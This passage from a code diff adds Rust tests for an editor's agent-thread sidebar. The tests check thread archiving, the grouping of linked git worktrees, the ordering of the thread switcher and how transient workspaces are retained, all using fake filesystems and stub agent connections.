test_archive_thread_uses_next_threads_own_workspace(cx: &mut TestAppContext) { + // Regression test: archive_thread previously always loaded the next thread + // through group_workspace (the main workspace's ProjectHeader), even when + // the next thread belonged to an absorbed linked-worktree workspace. That + // caused the worktree thread to be loaded in the main panel, which bound it + // to the main project and corrupted its stored folder_paths. + // + // The fix: use next.workspace (ThreadEntryWorkspace::Open) when available, + // falling back to group_workspace only for Closed workspaces. + agent_ui::test_support::init_test(cx); + cx.update(|cx| { + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); + + let fs = FakeFs::new(cx.executor()); + + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx)); + + let sidebar = setup_sidebar(&multi_workspace, cx); + + let worktree_workspace = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(worktree_project.clone(), window, cx) + }); + + // Activate main workspace so the sidebar tracks the main panel. + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); + }); + + let main_workspace = + multi_workspace.read_with(cx, |mw, _| mw.workspaces().next().unwrap().clone()); + let main_panel = add_agent_panel(&main_workspace, cx); + let _worktree_panel = add_agent_panel(&worktree_workspace, cx); + + // Open Thread 2 in the main panel and keep it running. + let connection = StubAgentConnection::new(); + open_thread_with_connection(&main_panel, connection.clone(), cx); + send_message(&main_panel, cx); + + let thread2_session_id = active_session_id(&main_panel, cx); + + cx.update(|_, cx| { + connection.send_update( + thread2_session_id.clone(), + acp::SessionUpdate::AgentMessageChunk(acp::ContentChunk::new("working...".into())), + cx, + ); + }); + + // Save thread 2's metadata with a newer timestamp so it sorts above thread 1. + save_thread_metadata( + thread2_session_id.clone(), + "Thread 2".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 2, 0, 0, 0).unwrap(), + None, + &main_project, + cx, + ); + + // Save thread 1's metadata with the worktree path and an older timestamp so + // it sorts below thread 2. archive_thread will find it as the "next" candidate. + let thread1_session_id = acp::SessionId::new(Arc::from("thread1-worktree-session")); + save_thread_metadata( + thread1_session_id, + "Thread 1".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &worktree_project, + cx, + ); + + cx.run_until_parked(); + + // Verify the sidebar absorbed thread 1 under [project] with the worktree chip. + let entries_before = visible_entries_as_strings(&sidebar, cx); + assert!( + entries_before.iter().any(|s| s.contains("{wt-feature-a}")), + "Thread 1 should appear with the linked-worktree chip before archiving: {:?}", + entries_before + ); + + // The sidebar should track T2 as the focused thread (derived from the + // main panel's active view). + sidebar.read_with(cx, |s, _| { + assert_active_thread( + s, + &thread2_session_id, + "focused thread should be Thread 2 before archiving", + ); + }); + + // Archive thread 2. + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.archive_thread(&thread2_session_id, window, cx); + }); + + cx.run_until_parked(); + + // The main panel's active thread must still be thread 2. + let main_active = main_panel.read_with(cx, |panel, cx| { + panel + .active_agent_thread(cx) + .map(|t| t.read(cx).session_id().clone()) + }); + assert_eq!( + main_active, + Some(thread2_session_id.clone()), + "main panel should not have been taken over by loading the linked-worktree thread T1; \ + before the fix, archive_thread used group_workspace instead of next.workspace, \ + causing T1 to be loaded in the wrong panel" + ); + + // Thread 1 should still appear in the sidebar with its worktree chip + // (Thread 2 was archived so it is gone from the list). + let entries_after = visible_entries_as_strings(&sidebar, cx); + assert!( + entries_after.iter().any(|s| s.contains("{wt-feature-a}")), + "T1 should still carry its linked-worktree chip after archiving T2: {:?}", + entries_after + ); +} + +#[gpui::test] +async fn test_linked_worktree_threads_not_duplicated_across_groups(cx: &mut TestAppContext) { + // When a multi-root workspace (e.g. [/other, /project]) shares a + // repo with a single-root workspace (e.g. [/project]), linked + // worktree threads from the shared repo should only appear under + // the dedicated group [project], not under [other, project]. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + // Two independent repos, each with their own git history. + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + fs.insert_tree( + "/other", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + // Register the linked worktree in the main repo. + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + // Workspace 1: just /project. + let project_only = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + project_only + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + // Workspace 2: /other and /project together (multi-root). + let multi_root = + project::Project::test(fs.clone(), ["/other".as_ref(), "/project".as_ref()], cx).await; + multi_root + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_only.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(multi_root.clone(), window, cx); + }); + + // Save a thread under the linked worktree path. + save_named_thread_metadata("wt-thread", "Worktree Thread", &worktree_project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // The thread should appear only under [project] (the dedicated + // group for the /project repo), not under [other, project]. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [other, project]", + " [+ New Thread]", + "v [project]", + " Worktree Thread {wt-feature-a}", + ] + ); +} + +#[gpui::test] +async fn test_thread_switcher_ordering(cx: &mut TestAppContext) { + let project = init_test_project_with_agent_panel("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + let switcher_ids = + |sidebar: &Entity, cx: &mut gpui::VisualTestContext| -> Vec { + sidebar.read_with(cx, |sidebar, cx| { + let switcher = sidebar + .thread_switcher + .as_ref() + .expect("switcher should be open"); + switcher + .read(cx) + .entries() + .iter() + .map(|e| e.session_id.clone()) + .collect() + }) + }; + + let switcher_selected_id = + |sidebar: &Entity, cx: &mut gpui::VisualTestContext| -> acp::SessionId { + sidebar.read_with(cx, |sidebar, cx| { + let switcher = sidebar + .thread_switcher + .as_ref() + .expect("switcher should be open"); + let s = switcher.read(cx); + s.selected_entry() + .expect("should have selection") + .session_id + .clone() + }) + }; + + // ── Setup: create three threads with distinct created_at times ────── + // Thread C (oldest), Thread B, Thread A (newest) — by created_at. + // We send messages in each so they also get last_message_sent_or_queued timestamps. + let connection_c = StubAgentConnection::new(); + connection_c.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done C".into()), + )]); + open_thread_with_connection(&panel, connection_c, cx); + send_message(&panel, cx); + let session_id_c = active_session_id(&panel, cx); + save_thread_metadata( + session_id_c.clone(), + "Thread C".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + Some(chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap()), + &project, + cx, + ); + + let connection_b = StubAgentConnection::new(); + connection_b.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done B".into()), + )]); + open_thread_with_connection(&panel, connection_b, cx); + send_message(&panel, cx); + let session_id_b = active_session_id(&panel, cx); + save_thread_metadata( + session_id_b.clone(), + "Thread B".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 2, 0, 0, 0).unwrap(), + Some(chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 2, 0, 0, 0).unwrap()), + &project, + cx, + ); + + let connection_a = StubAgentConnection::new(); + connection_a.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done A".into()), + )]); + open_thread_with_connection(&panel, connection_a, cx); + send_message(&panel, cx); + let session_id_a = active_session_id(&panel, cx); + save_thread_metadata( + session_id_a.clone(), + "Thread A".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 3, 0, 0, 0).unwrap(), + Some(chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 3, 0, 0, 0).unwrap()), + &project, + cx, + ); + + // All three threads are now live. Thread A was opened last, so it's + // the one being viewed. Opening each thread called record_thread_access, + // so all three have last_accessed_at set. + // Access order is: A (most recent), B, C (oldest). + + // ── 1. Open switcher: threads sorted by last_accessed_at ───────────────── + focus_sidebar(&sidebar, cx); + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.on_toggle_thread_switcher(&ToggleThreadSwitcher::default(), window, cx); + }); + cx.run_until_parked(); + + // All three have last_accessed_at, so they sort by access time. + // A was accessed most recently (it's the currently viewed thread), + // then B, then C. + assert_eq!( + switcher_ids(&sidebar, cx), + vec![ + session_id_a.clone(), + session_id_b.clone(), + session_id_c.clone() + ], + ); + // First ctrl-tab selects the second entry (B). + assert_eq!(switcher_selected_id(&sidebar, cx), session_id_b); + + // Dismiss the switcher without confirming. + sidebar.update_in(cx, |sidebar, _window, cx| { + sidebar.dismiss_thread_switcher(cx); + }); + cx.run_until_parked(); + + // ── 2. Confirm on Thread C: it becomes most-recently-accessed ────── + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.on_toggle_thread_switcher(&ToggleThreadSwitcher::default(), window, cx); + }); + cx.run_until_parked(); + + // Cycle twice to land on Thread C (index 2). + sidebar.read_with(cx, |sidebar, cx| { + let switcher = sidebar.thread_switcher.as_ref().unwrap(); + assert_eq!(switcher.read(cx).selected_index(), 1); + }); + sidebar.update_in(cx, |sidebar, _window, cx| { + sidebar + .thread_switcher + .as_ref() + .unwrap() + .update(cx, |s, cx| s.cycle_selection(cx)); + }); + cx.run_until_parked(); + assert_eq!(switcher_selected_id(&sidebar, cx), session_id_c); + + assert!(sidebar.update(cx, |sidebar, _cx| sidebar.thread_last_accessed.is_empty())); + + // Confirm on Thread C. + sidebar.update_in(cx, |sidebar, window, cx| { + let switcher = sidebar.thread_switcher.as_ref().unwrap(); + let focus = switcher.focus_handle(cx); + focus.dispatch_action(&menu::Confirm, window, cx); + }); + cx.run_until_parked(); + + // Switcher should be dismissed after confirm. + sidebar.read_with(cx, |sidebar, _cx| { + assert!( + sidebar.thread_switcher.is_none(), + "switcher should be dismissed" + ); + }); + + sidebar.update(cx, |sidebar, _cx| { + let last_accessed = sidebar + .thread_last_accessed + .keys() + .cloned() + .collect::>(); + assert_eq!(last_accessed.len(), 1); + assert!(last_accessed.contains(&session_id_c)); + assert!( + sidebar + .active_entry + .as_ref() + .expect("active_entry should be set") + .is_active_thread(&session_id_c) + ); + }); + + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.on_toggle_thread_switcher(&ToggleThreadSwitcher::default(), window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + switcher_ids(&sidebar, cx), + vec![ + session_id_c.clone(), + session_id_a.clone(), + session_id_b.clone() + ], + ); + + // Confirm on Thread A. + sidebar.update_in(cx, |sidebar, window, cx| { + let switcher = sidebar.thread_switcher.as_ref().unwrap(); + let focus = switcher.focus_handle(cx); + focus.dispatch_action(&menu::Confirm, window, cx); + }); + cx.run_until_parked(); + + sidebar.update(cx, |sidebar, _cx| { + let last_accessed = sidebar + .thread_last_accessed + .keys() + .cloned() + .collect::>(); + assert_eq!(last_accessed.len(), 2); + assert!(last_accessed.contains(&session_id_c)); + assert!(last_accessed.contains(&session_id_a)); + assert!( + sidebar + .active_entry + .as_ref() + .expect("active_entry should be set") + .is_active_thread(&session_id_a) + ); + }); + + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.on_toggle_thread_switcher(&ToggleThreadSwitcher::default(), window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + switcher_ids(&sidebar, cx), + vec![ + session_id_a.clone(), + session_id_c.clone(), + session_id_b.clone(), + ], + ); + + sidebar.update_in(cx, |sidebar, _window, cx| { + let switcher = sidebar.thread_switcher.as_ref().unwrap(); + switcher.update(cx, |switcher, cx| switcher.cycle_selection(cx)); + }); + cx.run_until_parked(); + + // Confirm on Thread B. + sidebar.update_in(cx, |sidebar, window, cx| { + let switcher = sidebar.thread_switcher.as_ref().unwrap(); + let focus = switcher.focus_handle(cx); + focus.dispatch_action(&menu::Confirm, window, cx); + }); + cx.run_until_parked(); + + sidebar.update(cx, |sidebar, _cx| { + let last_accessed = sidebar + .thread_last_accessed + .keys() + .cloned() + .collect::>(); + assert_eq!(last_accessed.len(), 3); + assert!(last_accessed.contains(&session_id_c)); + assert!(last_accessed.contains(&session_id_a)); + assert!(last_accessed.contains(&session_id_b)); + assert!( + sidebar + .active_entry + .as_ref() + .expect("active_entry should be set") + .is_active_thread(&session_id_b) + ); + }); + + // ── 3. Add a historical thread (no last_accessed_at, no message sent) ── + // This thread was never opened in a panel — it only exists in metadata. + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-historical")), + "Historical Thread".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 6, 1, 0, 0, 0).unwrap(), + Some(chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 6, 1, 0, 0, 0).unwrap()), + &project, + cx, + ); + + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.on_toggle_thread_switcher(&ToggleThreadSwitcher::default(), window, cx); + }); + cx.run_until_parked(); + + // Historical Thread has no last_accessed_at and no last_message_sent_or_queued, + // so it falls to tier 3 (sorted by created_at). It should appear after all + // accessed threads, even though its created_at (June 2024) is much later + // than the others. + // + // But the live threads (A, B, C) each had send_message called which sets + // last_message_sent_or_queued. So for the accessed threads (tier 1) the + // sort key is last_accessed_at; for Historical Thread (tier 3) it's created_at. + let session_id_hist = acp::SessionId::new(Arc::from("thread-historical")); + + let ids = switcher_ids(&sidebar, cx); + assert_eq!( + ids, + vec![ + session_id_b.clone(), + session_id_a.clone(), + session_id_c.clone(), + session_id_hist.clone() + ], + ); + + sidebar.update_in(cx, |sidebar, _window, cx| { + sidebar.dismiss_thread_switcher(cx); + }); + cx.run_until_parked(); + + // ── 4. Add another historical thread with older created_at ───────── + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-old-historical")), + "Old Historical Thread".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2023, 6, 1, 0, 0, 0).unwrap(), + Some(chrono::TimeZone::with_ymd_and_hms(&Utc, 2023, 6, 1, 0, 0, 0).unwrap()), + &project, + cx, + ); + + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.on_toggle_thread_switcher(&ToggleThreadSwitcher::default(), window, cx); + }); + cx.run_until_parked(); + + // Both historical threads have no access or message times. They should + // appear after accessed threads, sorted by created_at (newest first). + let session_id_old_hist = acp::SessionId::new(Arc::from("thread-old-historical")); + let ids = switcher_ids(&sidebar, cx); + assert_eq!( + ids, + vec![ + session_id_b, + session_id_a, + session_id_c, + session_id_hist, + session_id_old_hist, + ], + ); + + sidebar.update_in(cx, |sidebar, _window, cx| { + sidebar.dismiss_thread_switcher(cx); + }); + cx.run_until_parked(); +} + +#[gpui::test] +async fn test_archive_thread_keeps_metadata_but_hides_from_sidebar(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-to-archive")), + "Thread To Archive".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + cx.run_until_parked(); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + let entries = visible_entries_as_strings(&sidebar, cx); + assert!( + entries.iter().any(|e| e.contains("Thread To Archive")), + "expected thread to be visible before archiving, got: {entries:?}" + ); + + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.archive_thread( + &acp::SessionId::new(Arc::from("thread-to-archive")), + window, + cx, + ); + }); + cx.run_until_parked(); + + let entries = visible_entries_as_strings(&sidebar, cx); + assert!( + !entries.iter().any(|e| e.contains("Thread To Archive")), + "expected thread to be hidden after archiving, got: {entries:?}" + ); + + cx.update(|_, cx| { + let store = ThreadMetadataStore::global(cx); + let archived: Vec<_> = store.read(cx).archived_entries().collect(); + assert_eq!(archived.len(), 1); + assert_eq!(archived[0].session_id.0.as_ref(), "thread-to-archive"); + assert!(archived[0].archived); + }); +} + +#[gpui::test] +async fn test_archived_threads_excluded_from_sidebar_entries(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_thread_metadata( + acp::SessionId::new(Arc::from("visible-thread")), + "Visible Thread".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 2, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + + let archived_thread_session_id = acp::SessionId::new(Arc::from("archived-thread")); + save_thread_metadata( + archived_thread_session_id.clone(), + "Archived Thread".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + + cx.update(|_, cx| { + ThreadMetadataStore::global(cx).update(cx, |store, cx| { + store.archive(&archived_thread_session_id, cx) + }) + }); + cx.run_until_parked(); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + let entries = visible_entries_as_strings(&sidebar, cx); + assert!( + entries.iter().any(|e| e.contains("Visible Thread")), + "expected visible thread in sidebar, got: {entries:?}" + ); + assert!( + !entries.iter().any(|e| e.contains("Archived Thread")), + "expected archived thread to be hidden from sidebar, got: {entries:?}" + ); + + cx.update(|_, cx| { + let store = ThreadMetadataStore::global(cx); + let all: Vec<_> = store.read(cx).entries().collect(); + assert_eq!( + all.len(), + 2, + "expected 2 total entries in the store, got: {}", + all.len() + ); + + let archived: Vec<_> = store.read(cx).archived_entries().collect(); + assert_eq!(archived.len(), 1); + assert_eq!(archived[0].session_id.0.as_ref(), "archived-thread"); + }); +} + +#[gpui::test] +async fn test_linked_worktree_workspace_shows_main_worktree_threads(cx: &mut TestAppContext) { + // When only a linked worktree workspace is open (not the main repo), + // threads saved against the main repo should still appear in the sidebar. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + // Create the main repo with a linked worktree. + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": { + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a", + }, + }, + }, + "src": {}, + }), + ) + .await; + + fs.insert_tree( + "/wt-feature-a", + serde_json::json!({ + ".git": "gitdir: /project/.git/worktrees/feature-a", + "src": {}, + }), + ) + .await; + + fs.add_linked_worktree_for_repo( + std::path::Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "abc".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + // Only open the linked worktree as a workspace — NOT the main repo. + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = cx.add_window_view(|window, cx| { + MultiWorkspace::test_new(worktree_project.clone(), window, cx) + }); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Save a thread against the MAIN repo path. + save_named_thread_metadata("main-thread", "Main Repo Thread", &main_project, cx).await; + + // Save a thread against the linked worktree path. + save_named_thread_metadata("wt-thread", "Worktree Thread", &worktree_project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Both threads should be visible: the worktree thread by direct lookup, + // and the main repo thread because the workspace is a linked worktree + // and we also query the main repo path. + let entries = visible_entries_as_strings(&sidebar, cx); + assert!( + entries.iter().any(|e| e.contains("Main Repo Thread")), + "expected main repo thread to be visible in linked worktree workspace, got: {entries:?}" + ); + assert!( + entries.iter().any(|e| e.contains("Worktree Thread")), + "expected worktree thread to be visible, got: {entries:?}" + ); +} + +async fn init_multi_project_test( + paths: &[&str], + cx: &mut TestAppContext, +) -> (Arc, Entity) { + agent_ui::test_support::init_test(cx); + cx.update(|cx| { + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); + let fs = FakeFs::new(cx.executor()); + for path in paths { + fs.insert_tree(path, serde_json::json!({ ".git": {}, "src": {} })) + .await; + } + cx.update(|cx| ::set_global(fs.clone(), cx)); + let project = + project::Project::test(fs.clone() as Arc, [paths[0].as_ref()], cx).await; + (fs, project) +} + +async fn add_test_project( + path: &str, + fs: &Arc, + multi_workspace: &Entity, + cx: &mut gpui::VisualTestContext, +) -> Entity { + let project = project::Project::test(fs.clone() as Arc, [path.as_ref()], cx).await; + let workspace = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project, window, cx) + }); + cx.run_until_parked(); + workspace +} + +#[gpui::test] +async fn test_transient_workspace_lifecycle(cx: &mut TestAppContext) { + let (fs, project_a) = + init_multi_project_test(&["/project-a", "/project-b", "/project-c"], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + let _sidebar = setup_sidebar_closed(&multi_workspace, cx); + + // Sidebar starts closed. Initial workspace A is transient. + let workspace_a = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + assert!(!multi_workspace.read_with(cx, |mw, _| mw.sidebar_open())); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_a)); + + // Add B — replaces A as the transient workspace. + let workspace_b = add_test_project("/project-b", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_b)); + + // Add C — replaces B as the transient workspace. + let workspace_c = add_test_project("/project-c", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_c)); +} + +#[gpui::test] +async fn test_transient_workspace_retained(cx: &mut TestAppContext) { + let (fs, project_a) = init_multi_project_test( + &["/project-a", "/project-b", "/project-c", "/project-d"], + cx, + ) + .await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + let _sidebar = setup_sidebar(&multi_workspace, cx); + assert!(multi_workspace.read_with(cx, |mw, _| mw.sidebar_open())); + + // Add B — retained since sidebar is open. + let workspace_a = add_test_project("/project-b", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 2 + ); + + // Switch to A — B survives. (Switching from one internal workspace, to another) + multi_workspace.update_in(cx, |mw, window, cx| mw.activate(workspace_a, window, cx)); + cx.run_until_parked(); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 2 + ); + + // Close sidebar — both A and B remain retained. + multi_workspace.update_in(cx, |mw, window, cx| mw.close_sidebar(window, cx)); + cx.run_until_parked(); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 2 + ); + + // Add C — added as new transient workspace. (switching from retained, to transient) + let workspace_c = add_test_project("/project-c", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 3 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_c)); + + // Add D — replaces C as the transient workspace (Have retained and transient workspaces, transient workspace is dropped) + let workspace_d = add_test_project("/project-d", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 3 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_d)); +} + +#[gpui::test] +async fn test_transient_workspace_promotion(cx: &mut TestAppContext) { + let (fs, project_a) = + init_multi_project_test(&["/project-a", "/project-b", "/project-c"], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx)); + setup_sidebar_closed(&multi_workspace, cx); + + // Add B — replaces A as the transient workspace (A is discarded). + let workspace_b = add_test_project("/project-b", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_b)); + + // Open sidebar — promotes the transient B to retained. + multi_workspace.update_in(cx, |mw, window, cx| { + mw.toggle_sidebar(window, cx); + }); + cx.run_until_parked(); + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspaces().any(|w| w == &workspace_b))); + + // Close sidebar — the retained B remains. + multi_workspace.update_in(cx, |mw, window, cx| { + mw.toggle_sidebar(window, cx); + }); + + // Add C — added as new transient workspace. + let workspace_c = add_test_project("/project-c", &fs, &multi_workspace, cx).await; + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 2 + ); + assert!(multi_workspace.read_with(cx, |mw, _| mw.workspace() == &workspace_c)); +} + +#[gpui::test] +async fn test_legacy_thread_with_canonical_path_opens_main_repo_workspace(cx: &mut TestAppContext) { + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": { + "worktrees": { + "feature-a": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature-a", + }, + }, + }, + "src": {}, + }), + ) + .await; + + fs.insert_tree( + "/wt-feature-a", + serde_json::json!({ + ".git": "gitdir: /project/.git/worktrees/feature-a", + "src": {}, + }), + ) + .await; + + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "abc".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + // Only a linked worktree workspace is open — no workspace for /project. + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = cx.add_window_view(|window, cx| { + MultiWorkspace::test_new(worktree_project.clone(), window, cx) + }); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Save a legacy thread: folder_paths = main repo, main_worktree_paths = empty. + let legacy_session = acp::SessionId::new(Arc::from("legacy-main-thread")); + cx.update(|_, cx| { + let metadata = ThreadMetadata { + session_id: legacy_session.clone(), + agent_id: agent::ZED_AGENT_ID.clone(), + title: "Legacy Main Thread".into(), + updated_at: chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + created_at: None, + folder_paths: PathList::new(&[PathBuf::from("/project")]), + main_worktree_paths: PathList::default(), + archived: false, + }; + ThreadMetadataStore::global(cx).update(cx, |store, cx| store.save_manually(metadata, cx)); + }); + cx.run_until_parked(); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // The legacy thread should appear in the sidebar under the project group. + let entries = visible_entries_as_strings(&sidebar, cx); + assert!( + entries.iter().any(|e| e.contains("Legacy Main Thread")), + "legacy thread should be visible: {entries:?}", + ); + + // Verify only 1 workspace before clicking. + assert_eq!( + multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()), + 1, + ); + + // Focus and select the legacy thread, then confirm. + focus_sidebar(&sidebar, cx); + let thread_index = sidebar.read_with(cx, |sidebar, _| { + sidebar + .contents + .entries + .iter() + .position(|e| e.session_id().is_some_and(|id| id == &legacy_session)) + .expect("legacy thread should be in entries") + }); + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(thread_index); + }); + cx.dispatch_action(Confirm); + cx.run_until_parked(); + + let new_workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + let 